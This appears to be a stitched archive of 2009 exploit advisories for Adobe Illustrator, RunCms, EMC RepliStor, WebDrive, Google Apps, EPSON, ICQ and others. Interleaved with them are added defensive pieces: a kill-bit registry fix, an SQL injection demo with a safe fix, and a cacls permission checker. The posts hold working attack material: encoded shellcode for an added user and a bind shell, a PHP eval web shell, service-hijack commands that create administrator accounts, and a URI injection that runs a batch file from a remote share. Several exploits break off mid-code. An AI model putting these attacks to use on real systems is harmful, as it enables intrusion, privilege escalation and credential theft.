/* VT_PTR [26] [in] -- ? [29]  */ $riid,
/* VT_PTR [26] [in] -- VT_PTR [26]  */ $rgszNames,
/* VT_UINT [23] [in] */ $cNames,
/* VT_UI4 [19] [in] */ $lcid,
/* VT_PTR [26] [out] -- VT_I4 [3]  */ $rgdispid 
)
{
}
/* DISPID=1610678275 */
function Invoke(
/* VT_I4 [3] [in] */ $dispidMember,
/* VT_PTR [26] [in] -- ? [29]  */ $riid,
/* VT_UI4 [19] [in] */ $lcid,
/* VT_UI2 [18] [in] */ $wFlags,
/* VT_PTR [26] [in] -- ? [29]  */ $pdispparams,
/* VT_PTR [26] [out] -- VT_VARIANT [12]  */ $pvarResult,
/* VT_PTR [26] [out] -- ? [29]  */ $pexcepinfo,
/* VT_PTR [26] [out] -- VT_UINT [23]  */ $puArgErr 
)
{
}
/* DISPID=1 */
/* VT_BOOL [11] */
function Exec(
/* VT_PTR [26] [in] -- VT_BSTR [8]  */ $mod,
/* VT_PTR [26] [in] -- VT_BSTR [8]  */ $cmdline,
/* VT_BOOL [11] [in] */ $__MIDL_0097,
/* VT_BOOL [11] [in] */ $__MIDL_0098,
/* VT_PTR [26] [in] -- VT_BSTR [8]  */ $__MIDL_0099 
)
{
/* method Exec */
}
/* DISPID=2 */
/* VT_BOOL [11] */
function IsFinished(
)
{
}
/* DISPID=3 */
/* VT_UI4 [19] */
function CreateNamedMutex(
/* VT_BSTR [8] [in] */ $__MIDL_0102 
)
{
}
/* DISPID=4 */
function ReleaseMutex(
/* VT_UI4 [19] [in] */ $__MIDL_0104 
)
{
}
/* DISPID=5 */
function CloseMutex(
/* VT_UI4 [19] [in] */ $__MIDL_0105 
)
{
}
/* DISPID=6 */
/* VT_BOOL [11] */
function ObtainMutex(
/* VT_UI4 [19] [in] */ $__MIDL_0106 
)
{
}
/* DISPID=7 */
/* VT_BOOL [11] */
function WaitOnMutex(
/* VT_UI4 [19] [in] */ $__MIDL_0108,
/* VT_INT [22] [in] */ $__MIDL_0109 
)
{
}
/* DISPID=8 */
function CloseEvent(
/* VT_UI4 [19] [in] */ $__MIDL_0111 
)
{
}
/* DISPID=9 */
function FireEvent(
/* VT_UI4 [19] [in] */ $__MIDL_0112 
)
{
}
/* DISPID=10 */
/* VT_UI4 [19] */
function 

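A mitigation for both StubbyUtil controls above, as an added registry fragment that is not part of the advisories: setting the ActiveX kill bit (Compatibility Flags value 0x400) for the two CLSIDs the posts list makes Internet Explorer refuse to instantiate them regardless of their safe-for-scripting registration. The hive path is the standard one for IE kill bits; nothing else is assumed.

```reg
Windows Registry Editor Version 5.00

; Added example, not from the advisories: kill bit for the two StubbyUtil
; controls (CLSIDs quoted from the posts above).
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{80AB3FB6-9660-416C-BE8D-0E2E8AC3138B}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{5818813E-D53D-47A5-ABBB-37E2A07056B5}]
"Compatibility Flags"=dword:00000400
```

On 64-bit Windows the 32-bit Internet Explorer reads the same keys under HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\..., so set both. The kill bit only stops the browser from loading the control; the installer's own use of InstallerDlg.dll is unaffected.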
Adobe Illustrator CS4 (V14.0.0) Encapsulated Postscript (.eps) Overlong DSC Comment Buffer Overflow Exploit

2009-12-03 Thread nospam
<?php
/*
Adobe Illustrator CS4 (V14.0.0) Encapsulated Postscript (.eps)
overlong DSC Comment Buffer Overflow Exploit
by Nine:Situations:Group::pyrokinesis
site: http://retrogod.altervista.org/

An overlong string as DSC comment (more than 42000 bytes)
results in a direct EIP overwrite.
Exception is first-chance so the program will never crash.
At the moment of the redirection EAX and ESI are user-controlled.
This portion of the buffer begins with '%' (it is the next DSC
comment) but as you can see the resulting pattern is
nop-equivalent.

Tested and working against xp sp3
change the call esi if you need, must be alphabetic
I used a call esi from comctl32.dll on xp sp3,
change if needed.

Usage: php 9sg_illu.php
then double-click on the resulting 9sg.eps file
it will bind a shell on port 
change the shellcode for your needs even.
*/

# windows/adduser - 446 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, USER=adobe, PASS=kills
$_scode_i = "\xda\xc9\xd9\x74\x24\xf4\x59\x49\x49\x49\x49\x49\x49\x49" .
"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" .
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42" .
"\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75" .
"\x4a\x49\x4b\x4c\x4a\x48\x47\x34\x43\x30\x43\x30\x45\x50" .
"\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55\x43\x48" .
"\x45\x51\x4a\x4f\x4c\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f" .
"\x51\x30\x45\x51\x4a\x4b\x47\x39\x4c\x4b\x50\x34\x4c\x4b" .
"\x43\x31\x4a\x4e\x50\x31\x49\x50\x4a\x39\x4e\x4c\x4d\x54" .
"\x49\x50\x44\x34\x45\x57\x49\x51\x48\x4a\x44\x4d\x43\x31" .
"\x49\x52\x4a\x4b\x4a\x54\x47\x4b\x46\x34\x47\x54\x43\x34" .
"\x43\x45\x4a\x45\x4c\x4b\x51\x4f\x47\x54\x43\x31\x4a\x4b" .
"\x45\x36\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c" .
"\x45\x51\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x43\x31\x4a\x4b" .
"\x4d\x59\x51\x4c\x47\x54\x44\x44\x48\x43\x51\x4f\x50\x31" .
"\x4b\x46\x43\x50\x46\x36\x45\x34\x4c\x4b\x47\x36\x50\x30" .
"\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c\x4e\x4d" .
"\x4c\x4b\x42\x48\x43\x38\x4b\x39\x4a\x58\x4c\x43\x49\x50" .
"\x42\x4a\x46\x30\x42\x48\x4c\x30\x4d\x5a\x44\x44\x51\x4f" .
"\x45\x38\x4d\x48\x4b\x4e\x4c\x4a\x44\x4e\x51\x47\x4b\x4f" .
"\x4d\x37\x42\x43\x42\x4d\x42\x44\x46\x4e\x45\x35\x43\x48" .
"\x42\x45\x51\x30\x46\x4f\x45\x33\x47\x50\x42\x4e\x42\x45" .
"\x42\x54\x51\x30\x43\x45\x43\x43\x45\x35\x43\x42\x51\x30" .
"\x45\x31\x45\x34\x42\x4f\x42\x42\x43\x55\x47\x50\x42\x4b" .
"\x45\x39\x42\x4c\x42\x4c\x42\x53\x51\x30\x46\x4f\x51\x51" .
"\x47\x34\x50\x44\x51\x30\x47\x56\x51\x36\x51\x30\x42\x4e" .
"\x42\x45\x44\x34\x47\x50\x42\x4c\x42\x4f\x42\x43\x45\x31" .
"\x42\x4c\x43\x57\x43\x42\x42\x4f\x44\x35\x44\x30\x47\x50" .
"\x47\x31\x42\x44\x42\x4d\x42\x49\x42\x4e\x45\x39\x42\x53" .
"\x43\x44\x42\x52\x45\x31\x43\x44\x42\x4f\x44\x32\x44\x33" .
"\x51\x30\x45\x31\x45\x34\x42\x4f\x43\x52\x42\x45\x47\x50" .
"\x46\x4f\x47\x31\x47\x34\x51\x54\x45\x50\x41\x41";

# windows/shell_bind_tcp - 696 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=, RHOST=
$_scode_ii = "\x89\xe5\xda\xd0\xd9\x75\xf4\x5e\x56\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x4b\x4c\x43\x5a\x4a\x4b\x50\x4d\x4d\x38" .
"\x4b\x49\x4b\x4f\x4b\x4f\x4b\x4f\x45\x30\x4c\x4b\x42\x4c" .
"\x46\x44\x51\x34\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c" .
"\x43\x35\x43\x48\x43\x31\x4a\x4f\x4c\x4b\x50\x4f\x42\x38" .
"\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a\x4b\x51\x59\x4c\x4b" .
"\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49\x50\x4a\x39" .
"\x4e\x4c\x4d\x54\x49\x50\x43\x44\x45\x57\x49\x51\x49\x5a" .
"\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47\x4b\x50\x54" .
"\x51\x34\x46\x48\x43\x45\x4b\x55\x4c\x4b\x51\x4f\x47\x54" .
"\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b" .
"\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x45\x53\x46\x4c\x4c\x4b" .
"\x4b\x39\x42\x4c\x47\x54\x45\x4c\x45\x31\x48\x43\x46\x51" .

 

RunCms v.2M1 /modules/forum/post.php - 'forum' remote semi-blind SQL Injection Exploit

2009-10-26 Thread nospam
<?php
/*
RunCms v.2M1 /modules/forum/post.php - 'forum' remote semi-blind SQL Injection Exploit
by Nine:Situations:Group::bookoo
site: http://retrogod.altervista.org/

software site: http://www.runcms.org/

vulnerable code in /modules/forum/post.php near lines 16-34 :

...
if ( empty($_POST['forum']) ) {
    redirect_header("index.php", 2, _MD_ERRORFORUM);
    exit();
}
else if ( empty($_POST['message']) ) {
    redirect_header("javascript:history.go(-1)", 2, _MD_ERRORMESSAGE);
    exit();
}
else {
    $sql = "SELECT * FROM ".$bbTable['forums']." WHERE forum_id = ".$_POST['forum'].""; // <-- !!!
    if (!$result = $db->query($sql)) {
        redirect_header("index.php", 2, _MD_CANTGETFORUM);
        exit();
    }
...

'forum' variable is taken from $_POST[] array and inserted in a sql query without
prior sanitization and without being surrounded by quotes.

Then you can subsequently manipulate this query in /modules/forum/class/class.permissions.php by passing
another 'UNION SELECT' as first argument of the 'UNION SELECT' passed to post.php
(a little bit complex uh? $forum_id is user controlled ...)

100-102:

...
if ($user_id > 0) {
    $sql = "SELECT * FROM ".$bbTable['forum_access']." WHERE forum_id=$forum_id AND user_id=$user_id";
...

the result is that you can extract the sha1 hash of the admin user and the
corresponding salt.
If you cannot decrypt the hash... you can always hijack an active session (meaning the admin user
must be logged in) by building the admin cookie, no check ex. on ip address.

To do that you need the table prefix. A default one does not exist, but there is a
'suggested one' when installing the cms, which is 'runcms', but an empty one is not allowed.
However with MySQL 5.0 you can have the table prefix by interrogating information_schema.TABLES

This whole thing works regardless of php.ini settings but you need:

- a valid user account

Register!

- an existing row in [prefix]_forum_forums table
- an existing row in [prefix]_forum_forum_access table

which is very possible against a runcms installation with a working and active forum.

Also, you could manipulate the query in post.php to export a php shell through
'INTO DUMPFILE' method, but you need FILE privilege and magic_quotes_gpc = off.

It's also possible to disclose absolute path in certain conditions (see error_reporting)
by polluting a preg_match() argument:

http://[host]/[path_to_runcms]/modules/contact/index.php?op[]=1
http://[host]/[path_to_runcms]/userinfo.php?uid[]=1

Final notes:
This sql injection vulnerability has to be considered as high risk because as ADMIN you
can inject php code by the Filter/Banning functionalities, ex:

click 'Administration Menu', then 'System Admin', then click on the Filters/Banning icon,
then 'Prohibited: Emails'
Now you can edit the /modules/system/cache/bademails.php file
Type in:

<?php eval($_GET[c]);?>

then you launch commands:

http://[host]/[path_to_runcms]/modules/system/cache/bademails.php?c=system(dir);

you can do the same with all filter utilities ...
*/

$err[0] = "[!] This script is intended to be launched from the cli!";
$err[1] = "[!] You need the curl extension loaded!";

function my_header() {
    print ("\x52\x75\x6e\x43\x6d\x73\x20\x76\x2e\x32\x6d\x31\x20\x2f\x6d\x6f\x64\x75\x6c\x65\x73\x2f\x66\x6f\x72\x75\x6d\x2f\x70\x6f\x73\x74\x2e\x70\x68\x70\x20\x2d\x20\x27\x66\x6f\x72\x75\x6d\x27\x20\x72\x65\x6d\x6f\x74\x65\x20\x73\x65\x6d\x69\x2d\x62\x6c\x69\x6e\x64\x20\x53\x51\x4c\x20\x49\x6e\x6a\x65\x63\x74\x69\x6f\x6e\x20\x45\x78\x70\x6c\x6f\x69\x74\x20\xd\xa\x62\x79\x20\x4e\x69\x6e\x65\x3a\x53\x69\x74\x75\x61\x74\x69\x6f\x6e\x73\x3a\x47\x72\x6f\x75\x70\x3a\x3a\x62\x6f\x6f\x6b\x6f\x6f\xd\xa\x73\x69\x74\x65\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x72\x65\x74\x72\x6f\x67\x6f\x64\x2e\x61\x6c\x74\x65\x72\x76\x69\x73\x74\x61\x2e\x6f\x72\x67\x2f\xd\xa\n");
}

my_header();

if (php_sapi_name() <> "cli") {
    die($err[0]);
}

if (!extension_loaded('curl')) {
    $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
    if ($win) {
        !dl("php_curl.dll") ? die($err[1]) : print("[*] curl loaded\n");
    } else {
        !dl("php_curl.so") ? die($err[1]) : print("[*] curl loaded\n");
    }
}

function syntax() {
    print (
    "Syntax: php ".$argv[0]." [host] [path] [user] [pass] [OPTIONS] \n".
    "Options:\n".
    "--port:[port] - specify a port"

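The concatenation in post.php reproduced against SQLite, as an added example that is not RunCms code: vulnerable_lookup() glues the 'forum' value into the query exactly as the snippet above does, safe_lookup() casts and binds it, and table_names() is the SQLite counterpart of the information_schema.TABLES query the post mentions for recovering the prefix. The schema, rows, hash and salt are constructed; the 'runcms' prefix is the installer's suggested default quoted in the post; the UNION payload is mine and lines up three columns to match the forums table.

```python
# Added example (not RunCms code): the numeric 'forum' injection from
# post.php, replayed against an in-memory SQLite database.
import sqlite3

PREFIX = 'runcms'  # the installer's suggested table prefix, per the post


def setup_db() -> sqlite3.Connection:
    """Constructed schema and rows, loosely modelled on the tables the
    advisory names; the hash and salt are made up."""
    db = sqlite3.connect(':memory:')
    db.executescript(f"""
        CREATE TABLE {PREFIX}_forum_forums (forum_id INTEGER, forum_name TEXT, forum_desc TEXT);
        INSERT INTO {PREFIX}_forum_forums VALUES (1, 'General', 'talk');
        CREATE TABLE {PREFIX}_users (uid INTEGER, uname TEXT, pass TEXT, salt TEXT);
        INSERT INTO {PREFIX}_users VALUES (1, 'admin', 'da39a3ee5e6b4b0d3255bfef95601890afd80709', 's4lt');
    """)
    return db


def vulnerable_lookup(db, forum):
    """post.php style: the value is glued into the SQL without quotes or
    sanitization, so anything after the number is parsed as SQL."""
    sql = f"SELECT * FROM {PREFIX}_forum_forums WHERE forum_id = {forum}"
    return db.execute(sql).fetchall()


def safe_lookup(db, forum):
    """Fix: a numeric id has no business being a free-form string. Cast it
    (ValueError on anything but digits) and bind it as a parameter anyway."""
    forum_id = int(forum)
    sql = f"SELECT * FROM {PREFIX}_forum_forums WHERE forum_id = ?"
    return db.execute(sql, (forum_id,)).fetchall()


def table_names(db):
    """SQLite's equivalent of interrogating information_schema.TABLES on
    MySQL 5.0 to learn the prefix an installation uses."""
    return [r[0] for r in db.execute("SELECT name FROM sqlite_master WHERE type='table'")]


# Constructed payload in the spirit of the post: a UNION with as many
# columns as the forums table, pulling the admin hash and salt.
PAYLOAD = f"0 UNION SELECT uid, pass, salt FROM {PREFIX}_users WHERE uname='admin'"

if __name__ == '__main__':
    db = setup_db()
    print(vulnerable_lookup(db, PAYLOAD))
    try:
        safe_lookup(db, PAYLOAD)
    except ValueError as e:
        print('rejected:', e)
```

The vulnerable query returns the admin row's hash and salt in the forum columns; the same value makes safe_lookup() raise before any SQL runs. The post's second-stage trick (the recovered forum_id flowing into class.permissions.php) is the same defect one layer down: once a concatenated value is stored in a variable, every later query that concatenates that variable inherits the injection.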
EMC RepliStor Server (rep_serv.exe) 6.3.1.3 remote denial of service

2009-10-20 Thread nospam
<?php
/*
EMC RepliStor Server (rep_serv.exe) 6.3.1.3 remote denial of
service poc
by Nine:Situations:Group::bellick
*/

$host = "192.168.0.1";
$port = 7144;

$_sock = fsockopen($host, $port, $errno, $errstr, 2);
if (!$_sock) {
    echo "$errstr ($errno)\n";
} else {
    $_p = "\x54\x93\x00\x00\x41\x41\x41\x41\x41\x41\x41\x41".
          "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
          "\x41\x41\x41\x41";
    fputs($_sock, $_p);
    fclose($_sock);
}
?>



original url: http://retrogod.altervista.org/9sg_emc_repli_crash.html


South River Technologies WebDrive Service Bad Security Descriptor Local Elevation Of Privileges

2009-10-20 Thread nospam
South River Technologies WebDrive Service Bad Security Descriptor Local 
Elevation Of Privileges
by Nine:Situations:Group::bellick
site: http://retrogod.altervista.org/

Software site: http://www.webdrive.com/
Download location: http://www.webdrive.com/download/index.html

Tested against:
South River Technologies WebDrive 9.02 build 2232
on Microsoft Windows XP SP3

The WebDrive Service is installed with an empty security descriptor. A malicious user can
stop the service, then invoke the sc config command to replace the binary path with a value
of choice, then restart the service to run the command with SYSTEM privileges ex., run these
commands as a limited user:

sc stop WebDriveService
sc config WebDriveService binPath= "cmd /c net user southriver kills /add && net localgroup Administrators southriver /add"
sc start WebDriveService
runas /noprofile /user:%COMPUTERNAME%\southriver cmd

now login as administrator with password kills

mitigation:

the security descriptor of the service is like this:

C:\>sc sdshow WebDriveService

D:

change the security descriptor like the following:

c:\>sc sdset WebDriveService D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)
[SC] SetServiceObjectSecurity SUCCESS

original url: http://retrogod.altervista.org/9sg_south_river_priv.html


google apps googleapps.url.mailto:// uri handler cross-browser remote command execution exploit (IE)

2009-10-02 Thread nospam
google apps googleapps.url.mailto:// uri handler cross-browser remote command 
execution exploit (Internet Explorer)
by nine:situations:group::pyrokinesis
site: http://retrogod.altervista.org/

software site: http://pack.google.com/intl/it/pack_installer.html

tested against: Internet Explorer 8, windows xp sp3
Internet Explorer 7, windows xp sp3
Google Chrome 2.0.172.43

vulnerability:
through the vulnerable googleapps.url.mailto:// deprecated uri handler, 
registered as follows:

[HKEY_CLASSES_ROOT\GoogleApps.Url.mailto]
@="Google Apps URL"
"EditFlags"=hex:02,00,00,00
"FriendlyTypeName"="Google Apps URL"
"URL Protocol"=""

[HKEY_CLASSES_ROOT\GoogleApps.Url.mailto\DefaultIcon]
@="C:\\Programmi\\Google\\Google Apps\\googleapps.exe,0"

[HKEY_CLASSES_ROOT\GoogleApps.Url.mailto\shell]

[HKEY_CLASSES_ROOT\GoogleApps.Url.mailto\shell\open]

[HKEY_CLASSES_ROOT\GoogleApps.Url.mailto\shell\open\command]
@="C:\\Programmi\\Google\\Google Apps\\googleapps.exe --mailto.google.com=\"%1\""

is possible, against all versions of Internet Explorer, by injecting the 
--domain= switch
for the googleapps.exe executable, to pass arbitrary switches to the Google 
Chrome chrome.exe
executable (which is subsequently launched to open the gmail pages),
example: the --renderer-path and --no-sandbox switches.
Through them it is possible to launch an arbitrary executable from the local 
system:


googleapps.url.mailto://%20--domain=--what%20--renderer-path=calc%20--no-sandbox%20--x/


or to launch an arbitrary batch file from a remote network share:


googleapps.url.mailto://%20--domain=--x%20--renderer-path=\\192.168.0.1\uncshare\sh.bat%20--no-sandbox%20--x/


the resulting command line for chrome.exe is in this case:

C:\Programmi\Google\Chrome\Application\chrome.exe 
--app=https://mail.google.com/a/--x 
--renderer-path=\\192.168.0.1\uncshare\sh.bat --no-sandbox

--x//?view=cm&fs=1&to=googleapps.url.mailto%3A%2F%2F&rlz=1R6GPCK_en___IT344

which leverages the remote command execution issue

Mitigation:

unregister the uri handler by deleting the mentioned registry keys

original url: http://retrogod.altervista.org/9sg_google_apps_uri.html


Adobe Photoshop Elements 8.0 Active File Monitor Service Bad Security Descriptor Local Elevation Of Privileges

2009-09-29 Thread nospam
Adobe Photoshop Elements 8.0 Active File Monitor Service Bad Security 
Descriptor Local Elevation Of Privileges
by Nine:Situations:Group::bellick
site: http://retrogod.altervista.org/

Tested on Microsoft Windows XP SP3

The Adobe Active File Monitor V8 service is installed with an improper 
security descriptor.
A malicious user of the Users group (which on xp means a limited account) can 
stop the service,
then invoke the sc config command to replace the binary path with a value of 
choice, then restart
the service to run the command with SYSTEM privileges ex., run these commands 
as a limited user:

sc stop AdobeActiveFileMonitor8.0
sc config AdobeActiveFileMonitor8.0 binPath= "cmd /c net user adobe kills /add && net localgroup Administrators adobe /add"
sc start AdobeActiveFileMonitor8.0
runas /noprofile /user:%COMPUTERNAME%\adobe cmd

now login as administrator with password kills

mitigation:

the security descriptor of the service is like this:

C:\>sc sdshow AdobeActiveFileMonitor8.0

D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPWPDTLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

note the WO and WD permission for Everyone (!)

change the security descriptor like the following:

c:\>sc sdset AdobeActiveFileMonitor8.0 D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)
[SC] SetServiceObjectSecurity SUCCESS

readings, interesting article:
http://msmvps.com/blogs/erikr/archive/2007/09/26/set-permissions-on-a-specific-service-windows.aspx

original url: http://retrogod.altervista.org/9sg_adobe_pe_local.html


EPSON Status Monitor 3 local privilege escalation vulnerability

2009-07-30 Thread nospam
--- EPSON Status Monitor 3 local privilege escalation vulnerability 
by Nine:Situations:Group::bruiser
site: http://retrogod.altervista.org/

After that pyrokinesis found: http://www.milw0rm.com/exploits/9199
I prepared a tool to check for weak permissions and I came out with this:

C:\>sc qc EPSON_EB_RPCV4_01
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: EPSON_EB_RPCV4_01
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40ST7.EXE
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : EPSON V5 Service4(01)
        DEPENDENCIES       : RpcSs
        SERVICE_START_NAME : LocalSystem

C:\>CACLS "C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40ST7.EXE"
C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40ST7.EXE Everyone:F <--[ :( !!!]

C:\>SC QC EPSON_PM_RPCV4_01
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: EPSON_PM_RPCV4_01
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40RP7.EXE
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : EPSON V3 Service4(01)
        DEPENDENCIES       : RpcSs
        SERVICE_START_NAME : LocalSystem

C:\>CACLS "C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40RP7.EXE"
C:\Documents and Settings\All Users\Application Data\EPSON\EPW!3 SSRP\E_S40RP7.EXE Everyone:F <--[ :( !!!]

The executable files are installed with full control for Everyone; replace
them with your favourite rootkit.
They are carried by an EPSON STYLUS SX100 drivers cd. C'mon guys, no need for an
exploit code, it can be triggered by the available command line tools.

original url: http://retrogod.altervista.org/9sg_EPSON_local.html


Adobe related service (getPlus_HelperSvc.exe) local elevation of privileges

2009-07-20 Thread nospam
Adobe related service (getPlus_HelperSvc.exe) local elevation of privileges
by Nine:Situations:Group

description:
Adobe downloader used to download updates for Adobe applications.
Shipped with Acrobat Reader 9.x

vendor: Nos Microsystems

poc:

C:\>sc qc "getPlus(R) Helper"
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: getPlus(R) Helper
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Programmi\NOS\bin\getPlus_HelperSvc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : getPlus(R) Helper
        DEPENDENCIES       : RPCSS
        SERVICE_START_NAME : LocalSystem

C:\>cacls C:\Programmi\NOS\bin\getPlus_HelperSvc.exe
C:\Programmi\NOS\bin\getPlus_HelperSvc.exe BUILTIN\Users:F <-- [!!!]
                                           NT AUTHORITY\SYSTEM:F

The executable file is installed with improper permissions, with full
control for Builtin Users; a simple user can replace it with a binary of
choice.
At the next reboot it will run with SYSTEM privileges.

original url: http://retrogod.altervista.org/9sg_adobe_local.html

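The file-permission variant seen in the EPSON and getPlus posts above, as an added example that is not part of either advisory: a parser for the lines `cacls <file>` prints (first line is the path followed by the first ACE, continuation lines are indented ACEs) that returns the broad principals holding a write-equivalent right (F, C or W) on a service binary. The three sample outputs are constructed from the lines quoted in the posts plus one sane counter-example; the regex only knows the principal spellings cacls uses (Everyone, BUILTIN\..., NT AUTHORITY\..., DOMAIN\name) and is mine.

```python
# Added example (not from the advisories): find service binaries that
# unprivileged groups can overwrite, from `cacls` output.
import re

BROAD_PRINCIPALS = ('Everyone', 'BUILTIN\\Users',
                    'NT AUTHORITY\\Authenticated Users', 'NT AUTHORITY\\INTERACTIVE')
# cacls right letters that imply the file can be replaced: Full, Change, Write
WRITE_RIGHTS = {'F', 'C', 'W'}

# "<principal>:<inheritance flags><right letter>", e.g. "BUILTIN\Users:(OI)(CI)F"
ENTRY_RE = re.compile(
    r'(?P<who>Everyone|NT AUTHORITY\\[A-Za-z ]+?|BUILTIN\\[A-Za-z ]+?|[A-Za-z0-9_-]+\\[A-Za-z0-9_ -]+?)'
    r':(?P<inherit>(?:\([A-Z]+\))*)(?P<right>[A-Z])(?=\s|$)')


def parse_cacls(output: str) -> list:
    """Return [(principal, inheritance_flags, right_letter), ...] for every
    ACE in the output of `cacls <file>`; the leading path is skipped because
    it never matches the principal:right shape."""
    return [(m.group('who'), m.group('inherit'), m.group('right'))
            for m in ENTRY_RE.finditer(output)]


def writable_by_broad_group(output: str) -> list:
    """Broad principals that hold a write-equivalent right on the file."""
    return sorted({who for who, _, right in parse_cacls(output)
                   if who in BROAD_PRINCIPALS and right in WRITE_RIGHTS})


# Constructed samples: the two lines quoted in the posts (without the
# authors' annotations) and a correctly permissioned binary for contrast.
EPSON_OUT = ('C:\\Documents and Settings\\All Users\\Application Data\\EPSON\\EPW!3 SSRP\\E_S40ST7.EXE '
             'Everyone:F\n')
GETPLUS_OUT = ('C:\\Programmi\\NOS\\bin\\getPlus_HelperSvc.exe BUILTIN\\Users:F\n'
               '                                           NT AUTHORITY\\SYSTEM:F\n')
SANE_OUT = ('C:\\Program Files\\Vendor\\svc.exe BUILTIN\\Administrators:F\n'
            '                                   NT AUTHORITY\\SYSTEM:F\n'
            '                                   BUILTIN\\Users:R\n')

if __name__ == '__main__':
    for name, out in (('EPSON', EPSON_OUT), ('getPlus', GETPLUS_OUT), ('sane', SANE_OUT)):
        print(name, writable_by_broad_group(out) or 'ok')
```

The same check applied to every BINARY_PATH_NAME from `sc qc` (and to the directories on the path, since a writable parent directory lets a user rename the binary away and drop a replacement) catches this class before an installer ships. Note that `icacls` prints rights in a different shape, `(F)`, `(M)`, `(RX)`, so it needs its own pattern.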

ICQ 6.5 URL Search Hook/ICQToolBar.dll .URL file processing Windows Explorer remote buffer overflow poc

2009-06-01 Thread nospam
<?php
/*
ICQ 6.5 URL Search Hook/ICQToolBar.dll .URL file processing Windows Explorer
remote buffer overflow poc
by Nine:Situations:Group::pyrokinesis
site: http://retrogod.altervista.org/

If the resulting file is placed on the desktop, against ex. xp sp3
process explorer.exe will exit with code 1282 (0x502) that is
ERROR_STACK_BUFFER_OVERRUN and crash infinitely, you cannot even browse a folder
if the file is present in it
Solution: disable the shell extension, you may try shellexview by nirsoft

Note (added 30/05/2009, remote vector added): it works with network folders
too ...

against a win2k3 where explorer.exe is not patched with /GS flag:

(f44.104): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=02100068 ebx=772a23c1 ecx=0210cefa edx=00000823 esi=00610061 edi=00000000
eip=772a533f esp=0210cec0 ebp=0210cec4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
SHLWAPI!Ordinal400+0x2d:
772a533f 668906          mov     word ptr [esi],ax        ds:0023:00610061=????
0:010> g
(f44.104): Access violation - code c0000005 (!!! second chance !!!)
eax=02100068 ebx=772a23c1 ecx=0210cefa edx=00000823 esi=00610061 edi=00000000
eip=772a533f esp=0210cec0 ebp=0210cec4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
SHLWAPI!Ordinal400+0x2d:
772a533f 668906          mov     word ptr [esi],ax        ds:0023:00610061=????
0:010> gn
eax=00000001 ebx=00000000 ecx=00000000 edx=00000000 esi=00000000 edi=00000001
eip=7ffe0304 esp=0178fcf0 ebp=0178ff44 iopl=0         nv up ei pl zr na pe nc
